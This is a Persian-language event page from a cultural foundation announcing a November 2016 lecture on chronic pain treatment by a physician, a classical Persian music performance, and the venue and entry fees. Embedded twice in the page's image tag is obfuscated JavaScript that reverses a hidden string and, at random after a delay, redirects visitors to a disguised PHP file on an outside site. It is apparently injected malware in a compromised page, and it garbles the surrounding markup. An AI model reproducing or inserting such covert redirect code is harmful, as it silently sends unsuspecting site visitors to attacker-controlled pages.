Damavand Cultural Foundation presents: Chronic Pain treatment - Sunday, November 13

بنیاد فرهنگی دماوند
برنامه یکشنبه 13ماه نوامبر -2016
بخش نخست
ویژگیها و نوآوری های درمانی برای رفع درد و بیماریهای مزمن
سخنران : دکتر مهرداد معصومی
$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and_DrMasoumi.png">$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and_DrMasoumi" src="http://www.iacs-md.org/wp-content/uploads/2016/11/damavand_DrMasoumi.png" alt="" width="539" height="708" />

مختصری در باره سخنران: دکتر مهرداد معصومی، متخصص طب فیزیکی و توان بخشی و عضو آکادمی آمریکایی طب فیزیکی و توان بخشی و انجمن پزشکان آمریکایی متخصص در مهار و تسکین دردها است. او همچنین در انجمن فارغ التحصحیلان  فوق تخصص دانشگاه هاروارد عضویت دارد.

دکتر معصومی از دانشکدۀ پزشکی دانشگاه بیرمنگام که یکی از مهمترین دانشگاه های انگلستان شمرده می شود فارغ التحصیل شده و بعد از گذراندن دوسال کارآموزی جرّاحی  در مرکز بیمارستانی واشنگتن دی سی، در سال 1988 دورۀ رزیدنسی خود را در طب فیزیکی و توان بخشی در دانشگاه واشنگتن واقع در شهر سیاتل با موفقیت به پایان رسانده است.

دکتر معصومی دارای بیست و هشت سال تجربۀ عملی در رشتۀ تخصصی خویش است. او طی این مدت در مطب خصوصی خود در بالتیمور به مداوای بیماران مشغول بوده و مورد مشورت بسیاری از بیمارستانها ومراکز درمانی ناحیه نیز قرار داشته است.  وی مدتی هم عضو هیئت علمی دانشگاه جانز هاپکینز در بخش  طب فیزیکی و توان بخشی بوده و در نیمۀ اول دورۀ بیست و هشت سالۀ طبابت خود سخرانی هایی در زمینۀ مهار درد و درمان جراحات مزمن ایراد و خدماتی در همین زمینه در بیمارستانها ارائه کرده است.  دکتر معصومی اخیرا مطب دیگری در شهر راکویل در حومۀ واشنگتن دی سی گشوده و بیماران خود را در آن مکان نیزمی بیند.  مجلۀ بالتیمور از او به عنوان یکی از برجسته ترین پزشکان منطقه نام برده است. با توجه به همین سوابق رجوع به وی از طرف مراکز درمانی منطقه، ایالات دیگر و حتی از خارج  به بیماران توصیه می شود.

بخش دوم

اجرای موسیقی کلاسیک ایران

استاد کاظم دادودیان: سنتور بداهه نوازی

حسین کشاورز : آواز

زمان-یکشنبه 13 نوامبر 2016

گرد همائی ساعت 5:00 بعد از ظهر

(پذیرائی- چای –قهوه-شیرینی)

شروع سخنرانی ساعت 5:30

Montgomery college-Rockville

TC (Technical Center) Room#136

51 Mannakee Street

Rockville, MD 20850

N Campus Drive, -Park at Lot#9 (Across from Technical Center)

تلفن بنیاد:240-428-8337

دوستان با توجه به هزینه برگزاری برنامه ها، در صد و یکمین جلسه هیئت مدیره تصویب شد که ورودیه منظورشود

عضو 3.00$

مهمان 4.00$

This entry was posted in Lecture, Science/Technology. Bookmark the permalink.